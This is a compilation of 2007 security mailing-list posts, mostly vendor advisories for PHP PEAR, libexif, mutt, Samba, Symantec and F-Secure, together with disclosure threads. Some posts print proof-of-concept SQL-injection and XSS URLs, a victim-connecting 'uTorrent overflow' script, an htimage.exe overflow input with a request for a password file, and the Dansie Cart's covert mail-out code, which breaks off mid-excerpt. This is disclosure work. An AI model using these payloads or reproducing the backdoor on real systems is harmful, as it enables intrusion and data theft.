[ MDKSA-2007:110 ] - Updated php-pear packages fix directory traversal vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:110 http://www.mandriva.com/security/ ___ Package : php-pear Date: June 4, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A security hole was discovered in all versions of the PEAR Installer (http://pear.php.net/PEAR). The security hole is the most serious hole found to date in the PEAR Installer, and would allow a malicious package to install files anywhere in the filesystem. The vulnerability only affects users who are installing an intentionally created package with a malicious intent. Because the package is easily traced to its source, this is most likely to happen if a hacker were to compromise a PEAR channel server and alter a package to install a backdoor. In other words, it must be combined with other exploits to be a problem. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2519 ___ Updated Packages: Mandriva Linux 2007.0: 64c39ee86584450d0107064891db66a4 2007.0/i586/php-pear-5.1.6-1.1mdv2007.0.noarch.rpm ad180de3fabf01f13300b60d27e69b8a 2007.0/SRPMS/php-pear-5.1.6-1.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: e9cd136d7adb4cd156e8609bee74142c 2007.0/x86_64/php-pear-5.1.6-1.1mdv2007.0.noarch.rpm ad180de3fabf01f13300b60d27e69b8a 2007.0/SRPMS/php-pear-5.1.6-1.1mdv2007.0.src.rpm Mandriva Linux 2007.1: dc3c4b6fde1e247c7b7889720b9a1545 2007.1/i586/php-pear-5.2.1-2.1mdv2007.1.noarch.rpm c6314a0505a7acc4638bc6d001de3dce 2007.1/SRPMS/php-pear-5.2.1-2.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: d54d49680305ebe3e66074cb9ef9d837 2007.1/x86_64/php-pear-5.2.1-2.1mdv2007.1.noarch.rpm c6314a0505a7acc4638bc6d001de3dce 2007.1/SRPMS/php-pear-5.2.1-2.1mdv2007.1.src.rpm Corporate 3.0: 9d53ac39e37aeefb528ae3fd0992bdc3 corporate/3.0/i586/php-pear-4.3.4-3.3.C30mdk.noarch.rpm 2af0291e0a641824b71b209f177ee498 corporate/3.0/SRPMS/php-pear-4.3.4-3.3.C30mdk.src.rpm Corporate 3.0/X86_64: d32d35a205af81a080cf9081f1d09853 corporate/3.0/x86_64/php-pear-4.3.4-3.3.C30mdk.noarch.rpm 2af0291e0a641824b71b209f177ee498 corporate/3.0/SRPMS/php-pear-4.3.4-3.3.C30mdk.src.rpm Corporate 4.0: 7adcd35487d7069c97dd103a46328348 corporate/4.0/i586/php-pear-5.1.4-3.1.20060mlcs4.noarch.rpm 4a88c5020d4986d32fbd0fda00c6176c corporate/4.0/SRPMS/php-pear-5.1.4-3.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: efba2ee2dc33696c001dab09cfe6dd34 corporate/4.0/x86_64/php-pear-5.1.4-3.1.20060mlcs4.noarch.rpm 4a88c5020d4986d32fbd0fda00c6176c corporate/4.0/SRPMS/php-pear-5.1.4-3.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGZF3tmqjQ0CJFipgRAqHdAJ4/U5xXkgz1tBilWMJ33y6J4jbx4QCfY8nk IEujjQWOE/jaPU3KqZQxiMA= =VLsJ -END PGP SIGNATURE-
Disinfectors for the calculator virus (ti89.Gaara)
Hey, For those who are interrested, i made two types of Gaara (the calculator virus) disinfectors. The first one patches the virus body, which causes to return the control to the host just when the EPO injection travels the control to the virus. So the virus will not get executed at all. And the second one is trying to find an EPO injection by searching for BRA opcodes, and testing them for suitable conditions. Here are the codes: Dis1: Source: http://piotrbania.com/all/ti89/dis1.c Binary: http://piotrbania.com/all/ti89/dis1.89z Dis2: Source: http://piotrbania.com/all/ti89/dis2.c Binary: http://piotrbania.com/all/ti89/dis2.89z i hope you will find them somehow interresting. best regards, pb -- Piotr Bania - <[EMAIL PROTECTED]> - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 - "The more I learn about men, the more I love dogs."
Unpatched input validation flaw in Firefox 2.0.0.4
Firefox 2.0.0.4 contains a fix for a directory traversal vulnerability that allowed you to read local files through the resource protocol. However, the patch only partially fixed the vulnerability on Windows systems and accidentally circumvents an existing input validation check. The net result is that you can still read some local files on Windows and all user accessible files on Linux/Unix/OS X, with all user accessible files potentially readable as well on Windows through the patch regression. http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/ Cheers Thor Larholm
Re: [PLESK 7.5 Reload] & [PLESK 7.6 for MS Windows] path passing and disclosure vulnerability
I tried this on my server and it doesnt seem to work - asks me to login
RE: bugtraq submission
> -Original Message- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] > Sent: Friday, June 01, 2007 12:50 PM > To: bugtraq@securityfocus.com > Subject: bugtraq submission > > There are numerous XSS vulnerabilities in PHPLive v3.2.2 > (Maybe others) This vendor is incredibly non-resposive and apathetic about any security issue. I have yet to be contacted regarding previous issues and we often end up having to fix them ourselves. Anyone have better luck? Warner
rPSA-2007-0115-1 libexif
rPath Security Advisory: 2007-0115-1 Published: 2007-06-04 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Denial of Service Updated Versions: libexif=/[EMAIL PROTECTED]:devel//1/0.6.15-0.1-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645 https://issues.rpath.com/browse/RPL-1431 Description: Previous versions of the libexif package can cause applications to crash when loading malformed exif data. It is not currently known whether this vulnerability can be exploited to execute malicious code. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
rPSA-2007-0114-1 mutt
rPath Security Advisory: 2007-0114-1 Published: 2007-06-04 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local User Deterministic Privilege Escalation Updated Versions: mutt=/[EMAIL PROTECTED]:devel//1/1.4.2.3-0.1-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2683 http://dev.mutt.org/trac/ticket/2846 https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=239890 https://issues.rpath.com/browse/RPL-1232 https://issues.rpath.com/browse/RPL-1391 Description: In previous versions of the mutt package, it is possible for an attacker to subvert other local users' mutt processes causing them to run attacker-provided code. Additionally, it is possible for a hostile server masquerading as a user's APOP server to determine some characters from a user's password. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
SYM07-009,Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service
Symantec Security Advisory http://www.symantec.com/avcenter/security/Content/2007.06.01.html SYM07-009 1 June, 2007 Symantec Storage Foundation for Windows Volume Manager: Authentication Bypass and Potential Code Execution in Scheduler Service Revision History None Severity Medium Remote Access Yes, Local network access required Local Access No Authentication Required No Exploit publicly available No Overview An authentication bypass, remote code execution vulnerability has been identified and resolved in the Symantec Storage Foundation for Windows v5.0 Volume Manager Scheduler Service.Successful exploitation could result in potential compromise of the targeted system. Product(s) Affected Product Version Solution(s) Symantec Storage Foundation for Windows 5.0 http://support.veritas.com/docs/288627 Product(s) Not Affected Product Version Symantec Storage Foundation for Windows 3.1 Symantec Storage Foundation for Windows 4.1, 4.1RP1 Symantec Storage Foundation for Windows 4.2, 4.2RP1, 4.2RP2 Details 3Coms Zero Day Initiative, notified Symantec of an authentication bypass and arbitrary code execution vulnerability discovered in the Symantec Storage Foundation for Windows Scheduler Service, VxSchedService.exe. The Scheduler Service server, initially introduced in Symantec Storage Foundation for Windows v5.0, listens for incoming scheduling messages from client systems. An attacker with network access who could successfully connect directly to the Scheduler Service socket could bypass the built-in authentication in the management console. By properly manipulating this vector, the attacker has the potential to possibly add arbitrary commands to the registry that could be executed during normal scheduled runs. This vulnerability, if successfully exploited, would most likely be initiated by a malicious user authenticated on the local network since the affected service port should not normally be available to other than authorized network systems. Any potentially successful attack by a non-authorized remote attacker would most likely be a scenario of enticing an authorized user to run or allow to run malicious code that might successfully exploit this issue. Symantec Response Symantec takes the security of our products and our customers very seriously. Symantec engineers have verified and corrected this issue in Symantecs Storage Foundation for Windows 5.0. Updates are available for supported products. Symantec recommends customers apply the latest product update available for their supported product versions to enhance their security posture and protect against potential security threats of this nature. Symantec knows of no exploitation of or adverse customer impact from this issue. The patches listed above for affected product/version are available from the following location: http://support.veritas.com/docs/288627 Best Practices As part of normal best practices, Symantec strongly recommends: * Restrict access to administration or management systems to privileged users. * Restrict remote access, if required, to trusted/authorized systems only. * Run under the principle of least privilege where possible to limit the impact of exploit by threats. * Keep all operating systems and applications updated with the latest vendor patches. * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats. * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities CVE The Common Vulnerabilities and Exposures (CVE) initiative has assigned CVE Candidate CVE-2007-2279 to this issue. . This issue is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Credit: Symantec would like to thank 3Com/ZDI for reporting this issue and for providing full coordination while Symantec resolved it.
FLEA-2007-0024-1: libexif
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0024-1 Published: 2007-06-04 Rating: Moderate Updated Versions: libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645 https://issues.rpath.com/browse/RPL-1431 Description: Previous versions of the libexif package were vulnerable to an int overflow when loading EXIF data which could cause a crash (denial of service) or potentially allow the attacker to execute arbitrary code at the permission level of the user running a program which uses libexif. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) iQIVAwUBRmRzrNfwEn07iAtZAQLxIRAAv5km2r7UwvY40dnIo+JyLnNAhuvMHpb+ AhuXz+zTwOTigH9Dj0/cwwYqAbpYsuiX9cQRRqtjgxph5NOOYzE5F/w8pZzIDPgN jK4LbbDxOFWNv8Z8U84p5LLgFkcoXUajemC/qiLbz+vKC601Cnl7dFUSDs3YHSGq ndqwxtsRFpAQyc/lrbSFTGNFB0CIXUebgWTB66F2CSHP2sAGLoLCaxdFg6ELnNCC KiOfWGzVXqVZm5JHgDJ1LkTqKLY33LW1hAmdEYURHyDsv/yICk2BMWvaof5BqnF9 +bOigSv/aSjWis7jLJSX/JwL7GahRdtGloQebWKbxhPsYd5EQmGn11HulobCdcye 1epdIZn+yFbxxRrsOqWBawxc9XWMhOyzjOhenNpH+ebN86qrUxbKdF2fj2iLCyDG mFFx0NCTSh/gAKUdZWq3J9x9lzikjYwf8hFzSLm8nUtSLa8G8bp5zfHW2GNRnmqB 71oT3j6HUH93E1FwHBv9EL9x/sHw074Mbv2GC2XVN6rfHLyOfQcTszwaDgdQ2r/j SakgqyhQ7kUzO5eQbSntKdoscGBmXr0bMGfePTEMV8LfIpHTJUA0NwY+cItON8oF ylqH3T4sHo+wJXJSFZ8KyG9/xiyUJ6cmJk6JdlPj33/4uOpXd8/pxXSiiYI+HvrB gnhs6OBwDBg= =PLpW -END PGP SIGNATURE-
[SECURITY] [DSA 1291-4] New samba packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1291-4[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff June 4th, 2007 http://www.debian.org/security/faq - -- Package: samba Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2007-2444 CVE-2007-2446 CVE-2007-2447 The security update for CVE-2007-2446 introduced a regression, which broke connection to domain member servers in some scenarios. This update fixes this regression. For the stable distribution (etch), this regression has been fixed in version 3.0.24-6etch4. The old stable distribution (sarge) is not affected by this problem. For the unstable distribution (sid) this regression has been fixed in version 3.0.25a-1. We recommend that you upgrade your samba package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.dsc Size/MD5 checksum: 1425 8f114259be89190e485ce7af9819237a http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4.diff.gz Size/MD5 checksum: 213975 b1f423e27b5e602bde20079af4def838 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24.orig.tar.gz Size/MD5 checksum: 17708128 89273f67a6d8067cbbecefaa13747153 Architecture independent components: http://security.debian.org/pool/updates/main/s/samba/samba-doc-pdf_3.0.24-6etch4_all.deb Size/MD5 checksum: 6598934 edd2357b274c390c5eb1b717375739d3 http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.24-6etch4_all.deb Size/MD5 checksum: 6913278 b021af0b6c3418b746ba8601633b1074 Alpha architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 482930 b6e67ff868c705124ecc222c294b6325 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 879454 8d5b5d98ae37936a88fe620048b9e894 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 113980 833b703e6ba45577a13fa43e3d62f960 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 6705198 df69305a975f71d4b8516c9e40e10d21 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 4000734 067cc959bf00313dcbccfba7d7b25071 http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 2841182 c1888f9524b3164a51d82e18645b21bd http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 12298040 b8c24282e1905515e8df4027285ead0e http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 4845482 b0855a6477a5360108d386bf1d9c638e http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 521328 3650131a525b484a052a9187d91fd952 http://security.debian.org/pool/updates/main/s/samba/swat_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 956084 3c86aa8c33d96d4c29b3c423fb17f436 http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.24-6etch4_alpha.deb Size/MD5 checksum: 2286240 6ad90d8e15d1910a7c341682c1b0952b AMD64 architecture: http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 461894 76ea859453e8a97b4e41c4cfb2688f08 http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 831230 c8cf22235f65be1a6141bb026b5449e8 http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 112268 49c6b6a6566e8387fce1a5db47222499 http://security.debian.org/pool/updates/main/s/samba/python-samba_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 6254586 ac66bce2c71fc3a619b0f7f5beb9fbf8 http://security.debian.org/pool/updates/main/s/samba/samba_3.0.24-6etch4_amd64.deb Size/MD5 checksum: 3601620 d183a5bc0a81658d
n.runs-SA-2007.014 - F-Secure Antivirus ARJ parsing Infinite Loop Advisory
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.014 04-Jun-2007 Vendor:F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 7.00 and earlier F-Secure Anti-Virus for Windows Servers version 7.00 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 7.00 and earlier F-Secure Anti-Virus for MS Exchange version 7.00 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier F-Secure Anti-Virus for Linux Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.52 and earlier F-Secure Anti-Virus Linux Server Security 5.52 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Infinite Loop DoS (remote) Risk: HIGH Vendor communication: 2007/05/07initial notification to F-Secure Corporation 2007/05/08F-Secure Corporation Response 2007/05/08PGP public keys exchange 2007/05/08PoC files sent to F-Secure Corporation 2007/05/14F-Secure Corporation acknowledged the PoC files 2007/05/18F-Secure Corporation validate the Vulnerability 2007/05/18F-Secure Corporation notify update release date 2007/05/30F-Secure Corporation released Update with fixes Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. In detail, the following flaw was determined: - Infinite Loop in .ARJ files parsing Impact: This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. Credit: Bugs found by Sergio Alvarez of n.runs AG. References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
My Datebook SQL Injection + XSS
Application: My Datebook Web Sites: http://mealex.com/scripts.html http://www.theadminshop.com/ Versions: any (no version numbers can be found) Platform: linux, windows, freebsd, sun Bug: SQL Injection + XSS Severity: High (since there is no need to authenticate.) Fix Available: No --- 1) Introduction 2) Bug 3) The Code 4) Fix 5) About 6) Disclaimer === 1) Introduction === "My DataBook is a simple, php & mysql personal organizer." == 2) Bug == many SQL Injections and many XSS. === 3) Proof of concept. === The File diary.php is subject to several SQL Injections. some examples are: http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http://site/apppath/diary.php?month=06&year=2007&day=01&delete=%00' XSS example: http://site/apppath/diary.php?Sec=diary&month=06&year=alert(123123123)%3B&day=01 = 4) Fix = the authors email or contact details were not availble. if you using this software, try to fix it yourself or change it. 5) About Serapis.net www.Serapis.net - is a portal dedicated to web defacements, tracking defacements around the world. == 6) Disclaimer == The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. http://www.serapis.net http://calima.serapis.net/blogs/
n.runs-SA-2007.015 - F-Secure Antivirus FSG packed files parsing Infinite Loop Advisory
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.015 04-Jun-2007 Vendor:F-Secure Corporation, http://www.f-secure.com Affected Products: F-Secure Anti-Virus for Workstations version 7.00 and earlier F-Secure Anti-Virus for Windows Servers version 7.00 and earlier F-Secure Anti-Virus for Citrix Servers version 5.52 F-Secure Anti-Virus for MIMEsweeper version 5.61 and earlier F-Secure Anti-Virus Client Security version 7.00 and earlier F-Secure Anti-Virus for MS Exchange version 7.00 and earlier F-Secure Internet Gatekeeper version 6.60 and earlier F-Secure Internet Security 2005, 2006 and 2007 F-Secure Anti-Virus 2005, 2006 and 2007 Solutions based on F-Secure Protection Service for Consumers version 7.00 and earlier F-Secure Anti-Virus for Linux Servers version 4.65 and earlier F-Secure Anti-Virus for Linux Gateways version 4.65 and earlier F-Secure Anti-Virus Linux Client Security 5.52 and earlier F-Secure Anti-Virus Linux Server Security 5.52 and earlier F-Secure Internet Gatekeeper for Linux 2.16 and earlier Vulnerability: Infinite Loop DoS (remote) Risk: HIGH Vendor communication: 2007/05/07initial notification to F-Secure Corporation 2007/05/08F-Secure Corporation Response 2007/05/08PGP public keys exchange 2007/05/08PoC files sent to F-Secure Corporation 2007/05/14F-Secure Corporation acknowledged the PoC files 2007/05/18F-Secure Corporation validate the Vulnerability 2007/05/18F-Secure Corporation notify update release date 2007/05/30F-Secure Corporation released Update with fixes Overview: F-Secure Corporation protects consumers and businesses against computer viruses and other threats from the Internet and mobile networks. F-Secure award-winning solutions are available for workstations, gateways, servers and mobile phones. They include antivirus and desktop firewall with intrusion prevention, antispam and antispyware solutions, as well as network control solutions for Internet Service Providers. F-Secure protection is also available as a service through major ISPs, such as France Telecom, TeliaSonera, PCCW and Charter Communications. F-Secure is the global market leader in mobile phone protection provided through mobile operators, such as T-Mobile and Swisscom and mobile handset manufacturers such as Nokia. Description: A remotely exploitable vulnerability has been found in the files parsing engine. In detail, the following flaw was determined: - Infinite Loop in FSG packed files parsing Impact: This problem can lead to remote denial of service provoked by high CPU consume and exhaustion of storage resource if an attacker carefully crafts a file that exploits the aforementioned vulnerability. The vulnerability is present in F-Secure Corporation software products above mentioned in all platforms supported by the affected products. Solution: The vulnerability was reported on 07.May.2007 and an update has been issued on 30.May.2007 to solve this vulnerability. For detailed information about the fixes follow the link in References [1] section of this document. Credit: Bugs found by Sergio Alvarez of n.runs AG. References: http://www.f-secure.com/security/fsc-2007-3.shtml [1] This Advisory and Upcoming Advisories: http://www.nruns.com/parsing-engines-advisories.php Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2007 n.runs AG. All rights reserved. Terms of apply.
Re: Buffer overflow in BusinessMail email server system 4.60.00
[EMAIL PROTECTED] wrote: This problem was corrected within 14 days, and a new SMTP server was provided on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you still claim it is a problem. It is unclear who "you" is supposed to be here. I'm guessing this is the vulnerability referred to by: OSVDB 18407 CVE 2005-2472 ISS 21636 Secunia 16306 Bugtraq 14434 None of these indicate a solution is available. The Mail List post reporting this vulnerability was http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0002.html In the post, it says that a patch will soon be available. A quick glance at the download page at http://www.netcplus.com/downloads.html doesn't reveal a link to download the patch for 4.6. I also don't see any advisory for users of 4.6 that a patch is available. We will be happy to update our entry at osvdb.org, after verifying that a patch exists for 4.6, and an upgrade to 4.7 also solves the problem. Is that correct? Thanks, Steve Tornio osvdb.org You **were** notified of the release of the fix, and we have many other confirmations that it is indeed a good fix. We are now at 4.7 of BusinessMail, and that also still blocks this "vulenrability", and yet you continue to publich out of ate dand inaccurate information as being the truth. Kindly update your published information as relevant to reflect the true facts of this buglet. You can download an evaluation BusinessMail system from our web site to test this for yourself if you still do not beleive us. Thank You
uTorrent overflow
#!/bin/bash # # uTorrent overflow # mail: dj.r4iden[at]gmail.com # greet to : StrikerX , St0rM-MaN , MedoZero , hack_egy ,CPU # you must kno the victim ip and the port he use in uTorrent # clear echo "Enter your victam IP?" echo " " read victamIP victamIP=$victamIP echo " Enter your victam port?" echo " " read victamport victamport=$victamport echo "after you connect hold the enter key" echo -n "you wanna connect now?(y/n)" read X if [ "$X" = "y" ];then telnet $victamIP $victamport elif [ "$X" = "n" ];then echo " good bye" echo -n "exploit by dj.r4iden[at]gmail.com" fi
Recent OpenSSL exploits
Has anyone seen anything floating around for the OpenSSL SSL_Get_Shared_Ciphers Buffer Overflow (CVE-2006-3738/Bugtraq ID 20249)? I've been told there is one that has recently been floating around with blackhats, but I'm unable to confirm/deny. Ryan
CERN İmage Map Dispatcher
CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow us to access files. Problem #1 ~~ Like I said, the first bug gives us the full path to the root directory. I tested this vulnerability against some servers, all where vulnerable! Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926, 3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we have premission to execute "htimage.exe" + If "htimage.exe" exist). To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's installed by default) and premission to execute it. That's why only Windows is vulnerable, Unix based systems can't execute "*.exe" files. If we access "htimage.exe" using our favorite web browser like: http://server/cgi-bin/htimage.exe/linux?0,0 we get this error: - --- Error Error calling HTImage: Picture config file not found, tried the following: q:/hidden_directory_because_of_the_script_kiddies/webroot/linux /linux - --- Now we know that the path to the root directory is "q:/hidden_directory_because_of_the_script_kiddies/webroot/". Problem #2 ~~ Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and "FrontPage-PWS32". Tested / Vulnerable OS: Windows'95/98 "htimage.exe" buffer overflows if we access it like: http://server/cgi-bin/htimage.exe/<741 A's>?0,0. - --- HTIMAGE caused an invalid page fault in module at :41414141. Registers: 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4 ECX=0054015c DS=013f ESI=005401a0 FS=3467 EDX=bff76648 ES=013f EDI=00540184 GS= Bytes at CS:EIP: Stack dump: bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c - --- + <500 Server Error> First remote FrontPage exploit? Problem #3 ~~ It's not a serious bug. Using "htimage.exe" we can access files on server, but we can't read them. Accessing "htimage.exe" like: http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 outputs: - --- Error Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string) - --- NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden Solution 1) Remove "htimage.exe". 2) Do not use FrontPage, simple enough :)
Dansie Cart Script Exploit Reported
Synopsis : This program -deliberately- allows arbitrary commands to be executed on the victim server. One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things. The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, '[EMAIL PROTECTED]'. This is not readily apparent as the code that handles this transaction incorporates a simple Caesar Cipher to hide the email address. The cipher is handled via the subroutine 'there2': -- sub there2 { $_ = "$_[0]"; tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./; return $_; } --- The call that creates this email address and sends the mail is the function 'there3'. --- sub there3 { if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) { $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8'); $b = &there2('8v59_3jhhzi8'); pop(@there2); pop(@there2); $c = &there2("@there2"); open (TECH, "|$mailprog $a"); print TECH "To: $a\n"; print TECH "From: $a\n"; print TECH "Subject: $b\n\n"; print TECH "$path3\n"; print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n"; print TECH "$c\n"; print TECH "$e $there\n" if ($e); close (TECH); } } --- The ciphered strings, when passed through 'there2', result in: 8v59 == tech kte3cv== dansie ev8 == net 8v59_3jhhzi8 == tech-support $a== [EMAIL PROTECTED] $b== Subject: tech-support This seems curious, but plausible reasons could include insuring License compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent. While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks) -- if ( ( ( $FORM{'?'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?'} ) && (!$d) ) ) { if ( 